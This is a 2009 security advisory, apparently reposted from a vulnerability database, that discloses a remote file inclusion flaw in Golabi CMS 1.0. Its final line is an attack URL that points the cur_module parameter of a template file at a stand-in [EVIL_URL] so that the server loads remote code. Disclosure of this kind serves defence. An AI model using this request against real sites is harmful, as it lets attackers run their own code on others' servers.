Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21391
HistoryFeb 26, 2009 - 12:00 a.m.

Golabi CMS Remote File Inclusion Vulnerability

2009-02-2600:00:00
vulners.com
25

             [wWw.CrazyAngel.iR]  -   [info-AT-CrazyAngel.iR]

           [Golabi CMS Remote File Inclusion Vulnerability]

[+] Application Info:
[] Name: Golabi CMS
[
] Author: R3dM0ve
[] HomePage: http://golabicms.sourceforge.net/
[
] Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr

[+] Vulnerability Info:
[] Type: Remote File Inclusion (RFI)
[
] Requirement: register_globals [ON]
[] Risk: High Critical
[
] Bug Hunter: CrazyAngel
[] Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability
[
] Vul URL:
[GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]